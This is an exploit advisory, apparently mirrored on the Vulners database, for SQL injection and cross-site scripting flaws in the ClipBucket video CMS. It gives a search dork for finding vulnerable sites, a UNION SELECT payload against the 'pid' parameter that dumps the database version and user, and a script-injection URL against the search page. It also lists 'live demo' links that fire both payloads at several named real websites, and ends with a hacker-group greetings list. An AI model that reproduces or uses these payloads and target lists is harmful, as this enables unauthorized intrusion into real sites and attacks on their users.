Vulners
Lucene search
ClipBucket script SQL Injection / XSS Vulnerabilities
# Exploit Title : SQL Injection and XSS vulnerability in ClipBucket script
# Date : 01 July 2013
# Exploit Author : 3rr0r1046 IndiShell
# Vendor Homepage : http://clip-bucket.com/
# Category : webapps
# Tested on : Linux
# Dork : "Forged by ClipBucket"
////////////////////
DESCRIPTION
////////////////////
clipbucket is video and photo hosting cms in which user can upload videos and photos
this CMS has SQL injection vulnerability in 'pid' parameter in view_page.php page script
through which attacker can gain info from database by executing arbitrary SQL commands .
There is XSS flaw also exist in search_result.php in 'query ' parameter
//////////////////
POC SQL Injection
//////////////////
Dumping SQL version and user
http://127.0.0.1/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
live demo
1.http://insafpk.tv/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
2. http://vid48.com/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
3. http://koolspan.com/clip/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10 --+
4. http://comunicacionenvideos.agro.uba.ar/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
////////////////
POC XSS
////////////////
sample XSS attack url
http://127.0.0.1/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
live demo
1.http://insafpk.tv/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
2.http://comunicacionenvideos.agro.uba.ar/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
3. http://vid48.com/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
4. http://koolspan.com/clip/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
--==[[ Greetz To ]]==--
########################################################################################################
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,silent hacker and rest of TEAM INDISHELL
########################################################################################################
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jul 2013 00:00Current
7.1High risk
Vulners AI Score7.1